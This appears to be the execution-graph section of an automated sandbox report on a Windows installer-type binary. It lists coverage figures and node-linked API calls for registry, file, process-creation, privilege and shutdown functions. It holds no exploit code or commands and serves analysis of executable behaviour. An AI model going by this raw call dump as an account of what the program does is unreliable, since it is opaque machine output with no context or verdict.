                                                        Execution Graph

                                                        Execution Coverage:20.2%
                                                        Dynamic/Decrypted Code Coverage:13.3%
                                                        Signature Coverage:15.9%
                                                        Total number of Nodes:1619
                                                        Total number of Limit Nodes:50
                                                        execution_graph 4244 401bc0 4245 401c11 4244->4245 4246 401bcd 4244->4246 4248 401c16 4245->4248 4249 401c3b GlobalAlloc 4245->4249 4247 4023af 4246->4247 4252 401be4 4246->4252 4250 4066df 21 API calls 4247->4250 4257 401c56 4248->4257 4282 4066a2 lstrcpynW 4248->4282 4263 4066df 4249->4263 4254 4023bc 4250->4254 4280 4066a2 lstrcpynW 4252->4280 4254->4257 4283 405d02 4254->4283 4256 401c28 GlobalFree 4256->4257 4259 401bf3 4281 4066a2 lstrcpynW 4259->4281 4261 401c02 4287 4066a2 lstrcpynW 4261->4287 4268 4066ea 4263->4268 4264 406931 4265 40694a 4264->4265 4310 4066a2 lstrcpynW 4264->4310 4265->4257 4267 406902 lstrlenW 4267->4268 4268->4264 4268->4267 4269 4067fb GetSystemDirectoryW 4268->4269 4270 4066df 15 API calls 4268->4270 4274 406811 GetWindowsDirectoryW 4268->4274 4275 4066df 15 API calls 4268->4275 4276 4068a3 lstrcatW 4268->4276 4279 406873 SHGetPathFromIDListW CoTaskMemFree 4268->4279 4288 406570 4268->4288 4293 406a96 GetModuleHandleA 4268->4293 4299 406950 4268->4299 4308 4065e9 wsprintfW 4268->4308 4309 4066a2 lstrcpynW 4268->4309 4269->4268 4270->4267 4274->4268 4275->4268 4276->4268 4279->4268 4280->4259 4281->4261 4282->4256 4284 405d17 4283->4284 4285 405d63 4284->4285 4286 405d2b MessageBoxIndirectW 4284->4286 4285->4257 4286->4285 4287->4257 4311 40650f 4288->4311 4291 4065d4 4291->4268 4292 4065a4 RegQueryValueExW RegCloseKey 4292->4291 4294 406ab2 4293->4294 4295 406abc GetProcAddress 4293->4295 4315 406a26 GetSystemDirectoryW 4294->4315 4297 406acb 4295->4297 4297->4268 4298 406ab8 4298->4295 4298->4297 4306 40695d 4299->4306 4300 4069d3 4301 4069d8 CharPrevW 4300->4301 4303 4069f9 4300->4303 4301->4300 4302 4069c6 CharNextW 4302->4300 4302->4306 4303->4268 4305 4069b2 CharNextW 4305->4306 4306->4300 4306->4302 4306->4305 4307 4069c1 CharNextW 4306->4307 4318 405f9e 4306->4318 4307->4302 4308->4268 4309->4268 4310->4265 4312 40651e 4311->4312 4313 406522 4312->4313 4314 406527 RegOpenKeyExW 4312->4314 4313->4291 4313->4292 4314->4313 4316 406a48 wsprintfW LoadLibraryExW 4315->4316 4316->4298 4319 405fa4 4318->4319 4320 405fba 4319->4320 4321 405fab CharNextW 4319->4321 4320->4306 4321->4319 5426 406dc0 5427 406c44 5426->5427 5428 4075af 5427->5428 5429 406cc5 GlobalFree 5427->5429 5430 406cce GlobalAlloc 5427->5430 5431 406d45 GlobalAlloc 5427->5431 5432 406d3c GlobalFree 5427->5432 5429->5430 5430->5427 5430->5428 5431->5427 5431->5428 5432->5431 5433 402641 5434 402dcb 21 API calls 5433->5434 5435 402648 5434->5435 5438 406192 GetFileAttributesW CreateFileW 5435->5438 5437 402654 5438->5437 4459 4025c3 4471 402e0b 4459->4471 4462 402da9 21 API calls 4463 4025d6 4462->4463 4464 4025e5 4463->4464 4465 402953 4463->4465 4466 4025f2 RegEnumKeyW 4464->4466 4467 4025fe RegEnumValueW 4464->4467 4468 40261a RegCloseKey 4466->4468 4467->4468 4469 402613 4467->4469 4468->4465 4469->4468 4472 402dcb 21 API calls 4471->4472 4473 402e22 4472->4473 4474 40650f RegOpenKeyExW 4473->4474 4475 4025cd 4474->4475 4475->4462 5439 738b170d 5445 738b15b6 5439->5445 5441 738b176b GlobalFree 5442 738b1725 5442->5441 5443 738b1740 5442->5443 5444 738b1757 VirtualFree 5442->5444 5443->5441 5444->5441 5447 738b15bc 5445->5447 5446 738b15c2 5446->5442 5447->5446 5448 738b15ce GlobalFree 5447->5448 5448->5442 4941 4015c8 4942 402dcb 21 API calls 4941->4942 4943 4015cf SetFileAttributesW 4942->4943 4944 4015e1 4943->4944 4945 405cc8 ShellExecuteExW 4946 401fc9 4947 402dcb 21 API calls 4946->4947 4948 401fcf 4947->4948 4949 405727 28 API calls 4948->4949 4950 401fd9 4949->4950 4951 405c85 2 API calls 4950->4951 4952 401fdf 4951->4952 4953 402002 CloseHandle 4952->4953 4957 402953 4952->4957 4961 406b41 WaitForSingleObject 4952->4961 4953->4957 4956 401ff4 4958 402004 4956->4958 4959 401ff9 4956->4959 4958->4953 4966 4065e9 wsprintfW 4959->4966 4962 406b5b 4961->4962 4963 406b6d GetExitCodeProcess 4962->4963 4964 406ad2 2 API calls 4962->4964 4963->4956 4965 406b62 WaitForSingleObject 4964->4965 4965->4962 4966->4953 5456 404acb 5457 404b01 5456->5457 5458 404adb 5456->5458 5460 404688 8 API calls 5457->5460 5459 404621 22 API calls 5458->5459 5461 404ae8 SetDlgItemTextW 5459->5461 5462 404b0d 5460->5462 5461->5457 5466 738b1000 5469 738b101b 5466->5469 5470 738b15b6 GlobalFree 5469->5470 5471 738b1020 5470->5471 5472 738b1027 GlobalAlloc 5471->5472 5473 738b1024 5471->5473 5472->5473 5474 738b15dd 3 API calls 5473->5474 5475 738b1019 5474->5475 5054 40254f 5055 402e0b 21 API calls 5054->5055 5056 402559 5055->5056 5057 402dcb 21 API calls 5056->5057 5058 402562 5057->5058 5059 40256d RegQueryValueExW 5058->5059 5064 402953 5058->5064 5060 402593 RegCloseKey 5059->5060 5061 40258d 5059->5061 5060->5064 5061->5060 5065 4065e9 wsprintfW 5061->5065 5065->5060 5476 40204f 5477 402dcb 21 API calls 5476->5477 5478 402056 5477->5478 5479 406a96 5 API calls 5478->5479 5480 402065 5479->5480 5481 402081 GlobalAlloc 5480->5481 5482 4020f1 5480->5482 5481->5482 5483 402095 5481->5483 5484 406a96 5 API calls 5483->5484 5485 40209c 5484->5485 5486 406a96 5 API calls 5485->5486 5487 4020a6 5486->5487 5487->5482 5491 4065e9 wsprintfW 5487->5491 5489 4020df 5492 4065e9 wsprintfW 5489->5492 5491->5489 5492->5482 5493 4021cf 5494 402dcb 21 API calls 5493->5494 5495 4021d6 5494->5495 5496 402dcb 21 API calls 5495->5496 5497 4021e0 5496->5497 5498 402dcb 21 API calls 5497->5498 5499 4021ea 5498->5499 5500 402dcb 21 API calls 5499->5500 5501 4021f4 5500->5501 5502 402dcb 21 API calls 5501->5502 5503 4021fe 5502->5503 5504 40223d CoCreateInstance 5503->5504 5505 402dcb 21 API calls 5503->5505 5508 40225c 5504->5508 5505->5504 5506 401423 28 API calls 5507 40231b 5506->5507 5508->5506 5508->5507 5509 401a55 5510 402dcb 21 API calls 5509->5510 5511 401a5e ExpandEnvironmentStringsW 5510->5511 5512 401a72 5511->5512 5514 401a85 5511->5514 5513 401a77 lstrcmpW 5512->5513 5512->5514 5513->5514 5179 4023d7 5180 4023e5 5179->5180 5181 4023df 5179->5181 5183 4023f3 5180->5183 5185 402dcb 21 API calls 5180->5185 5182 402dcb 21 API calls 5181->5182 5182->5180 5184 402401 5183->5184 5186 402dcb 21 API calls 5183->5186 5187 402dcb 21 API calls 5184->5187 5185->5183 5186->5184 5188 40240a WritePrivateProfileStringW 5187->5188 5515 404757 lstrcpynW lstrlenW 5516 4014d7 5517 402da9 21 API calls 5516->5517 5518 4014dd Sleep 5517->5518 5520 402c4f 5518->5520 5189 402459 5190 402461 5189->5190 5191 40248c 5189->5191 5193 402e0b 21 API calls 5190->5193 5192 402dcb 21 API calls 5191->5192 5194 402493 5192->5194 5195 402468 5193->5195 5201 402e89 5194->5201 5197 402472 5195->5197 5198 4024a0 5195->5198 5199 402dcb 21 API calls 5197->5199 5200 402479 RegDeleteValueW RegCloseKey 5199->5200 5200->5198 5202 402e96 5201->5202 5203 402e9d 5201->5203 5202->5198 5203->5202 5205 402ece 5203->5205 5206 40650f RegOpenKeyExW 5205->5206 5207 402efc 5206->5207 5208 402f0c RegEnumValueW 5207->5208 5212 402f2f 5207->5212 5216 402fa6 5207->5216 5209 402f96 RegCloseKey 5208->5209 5208->5212 5209->5216 5210 402f6b RegEnumKeyW 5211 402f74 RegCloseKey 5210->5211 5210->5212 5213 406a96 5 API calls 5211->5213 5212->5209 5212->5210 5212->5211 5214 402ece 6 API calls 5212->5214 5215 402f84 5213->5215 5214->5212 5215->5216 5217 402f88 RegDeleteKeyW 5215->5217 5216->5202 5217->5216 5526 40175a 5527 402dcb 21 API calls 5526->5527 5528 401761 SearchPathW 5527->5528 5529 40177c 5528->5529 5530 401d5d 5531 402da9 21 API calls 5530->5531 5532 401d64 5531->5532 5533 402da9 21 API calls 5532->5533 5534 401d70 GetDlgItem 5533->5534 5535 40265d 5534->5535 5543 4047e0 5544 404912 5543->5544 5546 4047f8 5543->5546 5545 40497c 5544->5545 5547 404a46 5544->5547 5552 40494d GetDlgItem SendMessageW 5544->5552 5545->5547 5548 404986 GetDlgItem 5545->5548 5549 404621 22 API calls 5546->5549 5554 404688 8 API calls 5547->5554 5550 4049a0 5548->5550 5551 404a07 5548->5551 5553 40485f 5549->5553 5550->5551 5559 4049c6 SendMessageW LoadCursorW SetCursor 5550->5559 5551->5547 5555 404a19 5551->5555 5576 404643 EnableWindow 5552->5576 5557 404621 22 API calls 5553->5557 5558 404a41 5554->5558 5560 404a2f 5555->5560 5561 404a1f SendMessageW 5555->5561 5563 40486c CheckDlgButton 5557->5563 5580 404a8f 5559->5580 5560->5558 5565 404a35 SendMessageW 5560->5565 5561->5560 5562 404977 5577 404a6b 5562->5577 5574 404643 EnableWindow 5563->5574 5565->5558 5569 40488a GetDlgItem 5575 404656 SendMessageW 5569->5575 5571 4048a0 SendMessageW 5572 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5571->5572 5573 4048bd GetSysColor 5571->5573 5572->5558 5573->5572 5574->5569 5575->5571 5576->5562 5578 404a79 5577->5578 5579 404a7e SendMessageW 5577->5579 5578->5579 5579->5545 5583 405cc8 ShellExecuteExW 5580->5583 5582 4049f5 LoadCursorW SetCursor 5582->5551 5583->5582 5584 402663 5585 402692 5584->5585 5586 402677 5584->5586 5588 4026c2 5585->5588 5589 402697 5585->5589 5587 402da9 21 API calls 5586->5587 5596 40267e 5587->5596 5591 402dcb 21 API calls 5588->5591 5590 402dcb 21 API calls 5589->5590 5592 40269e 5590->5592 5593 4026c9 lstrlenW 5591->5593 5601 4066c4 WideCharToMultiByte 5592->5601 5593->5596 5595 4026b2 lstrlenA 5595->5596 5597 40270c 5596->5597 5598 4026f6 5596->5598 5600 406273 5 API calls 5596->5600 5598->5597 5599 406244 WriteFile 5598->5599 5599->5597 5600->5598 5601->5595 4476 403665 SetErrorMode GetVersionExW 4477 4036f1 4476->4477 4478 4036b9 GetVersionExW 4476->4478 4479 403748 4477->4479 4480 406a96 5 API calls 4477->4480 4478->4477 4481 406a26 3 API calls 4479->4481 4480->4479 4482 40375e lstrlenA 4481->4482 4482->4479 4483 40376e 4482->4483 4484 406a96 5 API calls 4483->4484 4485 403775 4484->4485 4486 406a96 5 API calls 4485->4486 4487 40377c 4486->4487 4488 406a96 5 API calls 4487->4488 4489 403788 #17 OleInitialize SHGetFileInfoW 4488->4489 4564 4066a2 lstrcpynW 4489->4564 4492 4037d7 GetCommandLineW 4565 4066a2 lstrcpynW 4492->4565 4494 4037e9 4495 405f9e CharNextW 4494->4495 4496 40380f CharNextW 4495->4496 4504 403821 4496->4504 4497 403923 4498 403937 GetTempPathW 4497->4498 4566 403634 4498->4566 4500 40394f 4501 403953 GetWindowsDirectoryW lstrcatW 4500->4501 4502 4039a9 DeleteFileW 4500->4502 4505 403634 12 API calls 4501->4505 4576 4030f5 GetTickCount GetModuleFileNameW 4502->4576 4503 405f9e CharNextW 4503->4504 4504->4497 4504->4503 4510 403925 4504->4510 4507 40396f 4505->4507 4507->4502 4509 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4507->4509 4508 4039bd 4514 405f9e CharNextW 4508->4514 4518 403a74 4508->4518 4548 403a64 4508->4548 4512 403634 12 API calls 4509->4512 4662 4066a2 lstrcpynW 4510->4662 4516 4039a1 4512->4516 4530 4039dc 4514->4530 4516->4502 4516->4518 4739 403c82 4518->4739 4519 403bc2 4523 405d02 MessageBoxIndirectW 4519->4523 4520 403be6 4521 403c6a ExitProcess 4520->4521 4522 403bee GetCurrentProcess OpenProcessToken 4520->4522 4525 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 4522->4525 4526 403c3a 4522->4526 4524 403bd0 ExitProcess 4523->4524 4525->4526 4532 406a96 5 API calls 4526->4532 4527 403a3a 4663 406079 4527->4663 4528 403a7d 4679 405c6d 4528->4679 4530->4527 4530->4528 4535 403c41 4532->4535 4538 403c56 ExitWindowsEx 4535->4538 4540 403c63 4535->4540 4538->4521 4538->4540 4539 403a9c 4542 403ab4 4539->4542 4683 4066a2 lstrcpynW 4539->4683 4543 40140b 2 API calls 4540->4543 4547 403ada wsprintfW 4542->4547 4561 403b06 4542->4561 4543->4521 4544 403a59 4678 4066a2 lstrcpynW 4544->4678 4549 4066df 21 API calls 4547->4549 4606 403d74 4548->4606 4549->4542 4552 403b50 SetCurrentDirectoryW 4729 406462 MoveFileExW 4552->4729 4553 403b16 GetFileAttributesW 4554 403b22 DeleteFileW 4553->4554 4553->4561 4554->4561 4558 406462 40 API calls 4558->4561 4559 4066df 21 API calls 4559->4561 4561->4518 4561->4542 4561->4547 4561->4552 4561->4553 4561->4558 4561->4559 4562 403bd8 CloseHandle 4561->4562 4684 405bf6 CreateDirectoryW 4561->4684 4687 405c50 CreateDirectoryW 4561->4687 4690 405dae 4561->4690 4733 405c85 CreateProcessW 4561->4733 4736 4069ff FindFirstFileW 4561->4736 4562->4518 4564->4492 4565->4494 4567 406950 5 API calls 4566->4567 4569 403640 4567->4569 4568 40364a 4568->4500 4569->4568 4748 405f71 lstrlenW CharPrevW 4569->4748 4572 405c50 2 API calls 4573 403658 4572->4573 4574 4061c1 2 API calls 4573->4574 4575 403663 4574->4575 4575->4500 4751 406192 GetFileAttributesW CreateFileW 4576->4751 4578 403138 4605 403145 4578->4605 4752 4066a2 lstrcpynW 4578->4752 4580 40315b 4753 405fbd lstrlenW 4580->4753 4584 40316c GetFileSize 4585 403266 4584->4585 4604 403183 4584->4604 4758 403053 4585->4758 4589 4032ab GlobalAlloc 4590 4032c2 4589->4590 4595 4061c1 2 API calls 4590->4595 4592 403303 4593 403053 36 API calls 4592->4593 4593->4605 4594 40328c 4596 403607 ReadFile 4594->4596 4597 4032d3 CreateFileW 4595->4597 4598 403297 4596->4598 4600 40330d 4597->4600 4597->4605 4598->4589 4598->4605 4599 403053 36 API calls 4599->4604 4773 40361d SetFilePointer 4600->4773 4602 40331b 4774 403396 4602->4774 4604->4585 4604->4592 4604->4599 4604->4605 4789 403607 4604->4789 4605->4508 4607 406a96 5 API calls 4606->4607 4608 403d88 4607->4608 4609 403da0 4608->4609 4610 403d8e GetUserDefaultUILanguage 4608->4610 4612 406570 3 API calls 4609->4612 4836 4065e9 wsprintfW 4610->4836 4614 403dd0 4612->4614 4613 403d9e 4837 40404a 4613->4837 4615 403def lstrcatW 4614->4615 4616 406570 3 API calls 4614->4616 4615->4613 4616->4615 4619 406079 18 API calls 4620 403e21 4619->4620 4621 403eb5 4620->4621 4624 406570 3 API calls 4620->4624 4622 406079 18 API calls 4621->4622 4623 403ebb 4622->4623 4626 403ecb LoadImageW 4623->4626 4627 4066df 21 API calls 4623->4627 4625 403e53 4624->4625 4625->4621 4630 403e74 lstrlenW 4625->4630 4633 405f9e CharNextW 4625->4633 4628 403f71 4626->4628 4629 403ef2 RegisterClassW 4626->4629 4627->4626 4632 40140b 2 API calls 4628->4632 4631 403f28 SystemParametersInfoW CreateWindowExW 4629->4631 4661 403f7b 4629->4661 4634 403e82 lstrcmpiW 4630->4634 4635 403ea8 4630->4635 4631->4628 4636 403f77 4632->4636 4637 403e71 4633->4637 4634->4635 4638 403e92 GetFileAttributesW 4634->4638 4639 405f71 3 API calls 4635->4639 4641 40404a 22 API calls 4636->4641 4636->4661 4637->4630 4640 403e9e 4638->4640 4642 403eae 4639->4642 4640->4635 4643 405fbd 2 API calls 4640->4643 4644 403f88 4641->4644 4845 4066a2 lstrcpynW 4642->4845 4643->4635 4646 403f94 ShowWindow 4644->4646 4647 404017 4644->4647 4649 406a26 3 API calls 4646->4649 4846 4057fa OleInitialize 4647->4846 4650 403fac 4649->4650 4652 403fba GetClassInfoW 4650->4652 4655 406a26 3 API calls 4650->4655 4651 40401d 4653 404021 4651->4653 4654 404039 4651->4654 4657 403fe4 DialogBoxParamW 4652->4657 4658 403fce GetClassInfoW RegisterClassW 4652->4658 4660 40140b 2 API calls 4653->4660 4653->4661 4656 40140b 2 API calls 4654->4656 4655->4652 4656->4661 4659 40140b 2 API calls 4657->4659 4658->4657 4659->4661 4660->4661 4661->4518 4662->4498 4854 4066a2 lstrcpynW 4663->4854 4665 40608a 4855 40601c CharNextW CharNextW 4665->4855 4668 403a46 4668->4518 4677 4066a2 lstrcpynW 4668->4677 4669 406950 5 API calls 4675 4060a0 4669->4675 4670 4060d1 lstrlenW 4671 4060dc 4670->4671 4670->4675 4673 405f71 3 API calls 4671->4673 4672 4069ff 2 API calls 4672->4675 4674 4060e1 GetFileAttributesW 4673->4674 4674->4668 4675->4668 4675->4670 4675->4672 4676 405fbd 2 API calls 4675->4676 4676->4670 4677->4544 4678->4548 4680 406a96 5 API calls 4679->4680 4681 403a82 lstrlenW 4680->4681 4682 4066a2 lstrcpynW 4681->4682 4682->4539 4683->4542 4685 405c42 4684->4685 4686 405c46 GetLastError 4684->4686 4685->4561 4686->4685 4688 405c60 4687->4688 4689 405c64 GetLastError 4687->4689 4688->4561 4689->4688 4691 406079 18 API calls 4690->4691 4692 405dce 4691->4692 4693 405dd6 DeleteFileW 4692->4693 4695 405ded 4692->4695 4700 405f24 4693->4700 4694 405f18 4694->4700 4703 4069ff 2 API calls 4694->4703 4695->4694 4861 4066a2 lstrcpynW 4695->4861 4697 405e13 4698 405e26 4697->4698 4699 405e19 lstrcatW 4697->4699 4702 405fbd 2 API calls 4698->4702 4701 405e2c 4699->4701 4700->4561 4704 405e3c lstrcatW 4701->4704 4706 405e47 lstrlenW FindFirstFileW 4701->4706 4702->4701 4705 405f32 4703->4705 4704->4706 4705->4700 4707 405f36 4705->4707 4708 405f0d 4706->4708 4727 405e69 4706->4727 4709 405f71 3 API calls 4707->4709 4708->4694 4710 405f3c 4709->4710 4712 405d66 5 API calls 4710->4712 4711 405ef0 FindNextFileW 4715 405f06 FindClose 4711->4715 4711->4727 4714 405f48 4712->4714 4716 405f62 4714->4716 4717 405f4c 4714->4717 4715->4708 4719 405727 28 API calls 4716->4719 4717->4700 4721 405727 28 API calls 4717->4721 4719->4700 4720 405dae 64 API calls 4720->4727 4722 405f59 4721->4722 4723 406462 40 API calls 4722->4723 4725 405f60 4723->4725 4724 405727 28 API calls 4724->4711 4725->4700 4726 405727 28 API calls 4726->4727 4727->4711 4727->4720 4727->4724 4727->4726 4728 406462 40 API calls 4727->4728 4862 4066a2 lstrcpynW 4727->4862 4863 405d66 4727->4863 4728->4727 4730 403b5f CopyFileW 4729->4730 4731 406476 4729->4731 4730->4518 4730->4561 4874 4062e8 4731->4874 4734 405cc4 4733->4734 4735 405cb8 CloseHandle 4733->4735 4734->4561 4735->4734 4737 406a20 4736->4737 4738 406a15 FindClose 4736->4738 4737->4561 4738->4737 4740 403c93 CloseHandle 4739->4740 4741 403c9d 4739->4741 4740->4741 4742 403cb1 4741->4742 4743 403ca7 CloseHandle 4741->4743 4908 403cdf 4742->4908 4743->4742 4746 405dae 71 API calls 4747 403bb5 OleUninitialize 4746->4747 4747->4519 4747->4520 4749 403652 4748->4749 4750 405f8d lstrcatW 4748->4750 4749->4572 4750->4749 4751->4578 4752->4580 4754 405fcb 4753->4754 4755 405fd1 CharPrevW 4754->4755 4756 403161 4754->4756 4755->4754 4755->4756 4757 4066a2 lstrcpynW 4756->4757 4757->4584 4759 403064 4758->4759 4760 40307c 4758->4760 4763 40306d DestroyWindow 4759->4763 4764 403074 4759->4764 4761 403084 4760->4761 4762 40308c GetTickCount 4760->4762 4793 406ad2 4761->4793 4762->4764 4766 40309a 4762->4766 4763->4764 4764->4589 4764->4605 4792 40361d SetFilePointer 4764->4792 4767 4030a2 4766->4767 4768 4030cf CreateDialogParamW ShowWindow 4766->4768 4767->4764 4797 403037 4767->4797 4768->4764 4770 4030b0 wsprintfW 4800 405727 4770->4800 4773->4602 4775 4033c1 4774->4775 4776 4033a5 SetFilePointer 4774->4776 4811 40349e GetTickCount 4775->4811 4776->4775 4781 40349e 46 API calls 4782 4033f8 4781->4782 4783 40345e 4782->4783 4784 403464 ReadFile 4782->4784 4786 403407 4782->4786 4783->4605 4784->4783 4786->4783 4787 406215 ReadFile 4786->4787 4826 406244 WriteFile 4786->4826 4787->4786 4790 406215 ReadFile 4789->4790 4791 40361a 4790->4791 4791->4604 4792->4594 4794 406aef PeekMessageW 4793->4794 4795 406ae5 DispatchMessageW 4794->4795 4796 406aff 4794->4796 4795->4794 4796->4764 4798 403046 4797->4798 4799 403048 MulDiv 4797->4799 4798->4799 4799->4770 4801 405742 4800->4801 4810 4030cd 4800->4810 4802 40575e lstrlenW 4801->4802 4803 4066df 21 API calls 4801->4803 4804 405787 4802->4804 4805 40576c lstrlenW 4802->4805 4803->4802 4807 40579a 4804->4807 4808 40578d SetWindowTextW 4804->4808 4806 40577e lstrcatW 4805->4806 4805->4810 4806->4804 4809 4057a0 SendMessageW SendMessageW SendMessageW 4807->4809 4807->4810 4808->4807 4809->4810 4810->4764 4812 4035f6 4811->4812 4813 4034cc 4811->4813 4814 403053 36 API calls 4812->4814 4828 40361d SetFilePointer 4813->4828 4820 4033c8 4814->4820 4816 4034d7 SetFilePointer 4822 4034fc 4816->4822 4817 403607 ReadFile 4817->4822 4819 403053 36 API calls 4819->4822 4820->4783 4824 406215 ReadFile 4820->4824 4821 406244 WriteFile 4821->4822 4822->4817 4822->4819 4822->4820 4822->4821 4823 4035d7 SetFilePointer 4822->4823 4829 406c11 4822->4829 4823->4812 4825 4033e1 4824->4825 4825->4781 4825->4783 4827 406262 4826->4827 4827->4786 4828->4816 4830 406c36 4829->4830 4831 406c3e 4829->4831 4830->4822 4831->4830 4832 406cc5 GlobalFree 4831->4832 4833 406cce GlobalAlloc 4831->4833 4834 406d45 GlobalAlloc 4831->4834 4835 406d3c GlobalFree 4831->4835 4832->4833 4833->4830 4833->4831 4834->4830 4834->4831 4835->4834 4836->4613 4838 40405e 4837->4838 4853 4065e9 wsprintfW 4838->4853 4840 4040cf 4841 404103 22 API calls 4840->4841 4843 4040d4 4841->4843 4842 403dff 4842->4619 4843->4842 4844 4066df 21 API calls 4843->4844 4844->4843 4845->4621 4847 40466d SendMessageW 4846->4847 4851 40581d 4847->4851 4848 405844 4849 40466d SendMessageW 4848->4849 4850 405856 OleUninitialize 4849->4850 4850->4651 4851->4848 4852 401389 2 API calls 4851->4852 4852->4851 4853->4840 4854->4665 4856 406039 4855->4856 4858 40604b 4855->4858 4856->4858 4859 406046 CharNextW 4856->4859 4857 40606f 4857->4668 4857->4669 4858->4857 4860 405f9e CharNextW 4858->4860 4859->4857 4860->4858 4861->4697 4862->4727 4871 40616d GetFileAttributesW 4863->4871 4866 405d81 RemoveDirectoryW 4869 405d8f 4866->4869 4867 405d89 DeleteFileW 4867->4869 4868 405d93 4868->4727 4869->4868 4870 405d9f SetFileAttributesW 4869->4870 4870->4868 4872 405d72 4871->4872 4873 40617f SetFileAttributesW 4871->4873 4872->4866 4872->4867 4872->4868 4873->4872 4875 406318 4874->4875 4876 40633e GetShortPathNameW 4874->4876 4901 406192 GetFileAttributesW CreateFileW 4875->4901 4878 406353 4876->4878 4879 40645d 4876->4879 4878->4879 4881 40635b wsprintfA 4878->4881 4879->4730 4880 406322 CloseHandle GetShortPathNameW 4880->4879 4882 406336 4880->4882 4883 4066df 21 API calls 4881->4883 4882->4876 4882->4879 4884 406383 4883->4884 4902 406192 GetFileAttributesW CreateFileW 4884->4902 4886 406390 4886->4879 4887 40639f GetFileSize GlobalAlloc 4886->4887 4888 4063c1 4887->4888 4889 406456 CloseHandle 4887->4889 4890 406215 ReadFile 4888->4890 4889->4879 4891 4063c9 4890->4891 4891->4889 4903 4060f7 lstrlenA 4891->4903 4894 4063e0 lstrcpyA 4897 406402 4894->4897 4895 4063f4 4896 4060f7 4 API calls 4895->4896 4896->4897 4898 406439 SetFilePointer 4897->4898 4899 406244 WriteFile 4898->4899 4900 40644f GlobalFree 4899->4900 4900->4889 4901->4880 4902->4886 4904 406138 lstrlenA 4903->4904 4905 406140 4904->4905 4906 406111 lstrcmpiA 4904->4906 4905->4894 4905->4895 4906->4905 4907 40612f CharNextA 4906->4907 4907->4904 4909 403ced 4908->4909 4910 403cb6 4909->4910 4911 403cf2 FreeLibrary GlobalFree 4909->4911 4910->4746 4911->4910 4911->4911 4918 4015e6 4919 402dcb 21 API calls 4918->4919 4920 4015ed 4919->4920 4921 40601c 4 API calls 4920->4921 4933 4015f6 4921->4933 4922 401656 4924 401688 4922->4924 4925 40165b 4922->4925 4923 405f9e CharNextW 4923->4933 4928 401423 28 API calls 4924->4928 4937 401423 4925->4937 4935 401680 4928->4935 4930 405c50 2 API calls 4930->4933 4931 405c6d 5 API calls 4931->4933 4932 40166f SetCurrentDirectoryW 4932->4935 4933->4922 4933->4923 4933->4930 4933->4931 4934 40163c GetFileAttributesW 4933->4934 4936 405bf6 2 API calls 4933->4936 4934->4933 4936->4933 4938 405727 28 API calls 4937->4938 4939 401431 4938->4939 4940 4066a2 lstrcpynW 4939->4940 4940->4932 5602 405866 5603 405a10 5602->5603 5604 405887 GetDlgItem GetDlgItem GetDlgItem 5602->5604 5606 405a41 5603->5606 5607 405a19 GetDlgItem CreateThread CloseHandle 5603->5607 5647 404656 SendMessageW 5604->5647 5609 405a6c 5606->5609 5610 405a91 5606->5610 5611 405a58 ShowWindow ShowWindow 5606->5611 5607->5606 5608 4058f7 5613 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 5608->5613 5612 405acc 5609->5612 5615 405a80 5609->5615 5616 405aa6 ShowWindow 5609->5616 5617 404688 8 API calls 5610->5617 5649 404656 SendMessageW 5611->5649 5612->5610 5622 405ada SendMessageW 5612->5622 5620 405950 SendMessageW SendMessageW 5613->5620 5621 40596c 5613->5621 5623 4045fa SendMessageW 5615->5623 5618 405ac6 5616->5618 5619 405ab8 5616->5619 5629 405a9f 5617->5629 5625 4045fa SendMessageW 5618->5625 5624 405727 28 API calls 5619->5624 5620->5621 5626 405971 SendMessageW 5621->5626 5627 40597f 5621->5627 5628 405af3 CreatePopupMenu 5622->5628 5622->5629 5623->5610 5624->5618 5625->5612 5626->5627 5631 404621 22 API calls 5627->5631 5630 4066df 21 API calls 5628->5630 5632 405b03 AppendMenuW 5630->5632 5633 40598f 5631->5633 5634 405b20 GetWindowRect 5632->5634 5635 405b33 TrackPopupMenu 5632->5635 5636 405998 ShowWindow 5633->5636 5637 4059cc GetDlgItem SendMessageW 5633->5637 5634->5635 5635->5629 5639 405b4e 5635->5639 5640 4059bb 5636->5640 5641 4059ae ShowWindow 5636->5641 5637->5629 5638 4059f3 SendMessageW SendMessageW 5637->5638 5638->5629 5642 405b6a SendMessageW 5639->5642 5648 404656 SendMessageW 5640->5648 5641->5640 5642->5642 5643 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5642->5643 5645 405bac SendMessageW 5643->5645 5645->5645 5646 405bd5 GlobalUnlock SetClipboardData CloseClipboard 5645->5646 5646->5629 5647->5608 5648->5637 5649->5609 5650 404e68 5651 404e94 5650->5651 5652 404e78 5650->5652 5654 404ec7 5651->5654 5655 404e9a SHGetPathFromIDListW 5651->5655 5661 405ce6 GetDlgItemTextW 5652->5661 5657 404eb1 SendMessageW 5655->5657 5658 404eaa 5655->5658 5656 404e85 SendMessageW 5656->5651 5657->5654 5659 40140b 2 API calls 5658->5659 5659->5657 5661->5656 5662 401c68 5663 402da9 21 API calls 5662->5663 5664 401c6f 5663->5664 5665 402da9 21 API calls 5664->5665 5666 401c7c 5665->5666 5667 401c91 5666->5667 5668 402dcb 21 API calls 5666->5668 5669 401ca1 5667->5669 5670 402dcb 21 API calls 5667->5670 5668->5667 5671 401cf8 5669->5671 5672 401cac 5669->5672 5670->5669 5673 402dcb 21 API calls 5671->5673 5674 402da9 21 API calls 5672->5674 5676 401cfd 5673->5676 5675 401cb1 5674->5675 5677 402da9 21 API calls 5675->5677 5678 402dcb 21 API calls 5676->5678 5679 401cbd 5677->5679 5680 401d06 FindWindowExW 5678->5680 5681 401ce8 SendMessageW 5679->5681 5682 401cca SendMessageTimeoutW 5679->5682 5683 401d28 5680->5683 5681->5683 5682->5683 5684 4028e9 5685 4028ef 5684->5685 5686 4028f7 FindClose 5685->5686 5687 402c4f 5685->5687 5686->5687 5688 4016f1 5689 402dcb 21 API calls 5688->5689 5690 4016f7 GetFullPathNameW 5689->5690 5691 401711 5690->5691 5697 401733 5690->5697 5693 4069ff 2 API calls 5691->5693 5691->5697 5692 401748 GetShortPathNameW 5694 402c4f 5692->5694 5695 401723 5693->5695 5695->5697 5698 4066a2 lstrcpynW 5695->5698 5697->5692 5697->5694 5698->5697 5699 401e73 GetDC 5700 402da9 21 API calls 5699->5700 5701 401e85 GetDeviceCaps MulDiv ReleaseDC 5700->5701 5702 402da9 21 API calls 5701->5702 5703 401eb6 5702->5703 5704 4066df 21 API calls 5703->5704 5705 401ef3 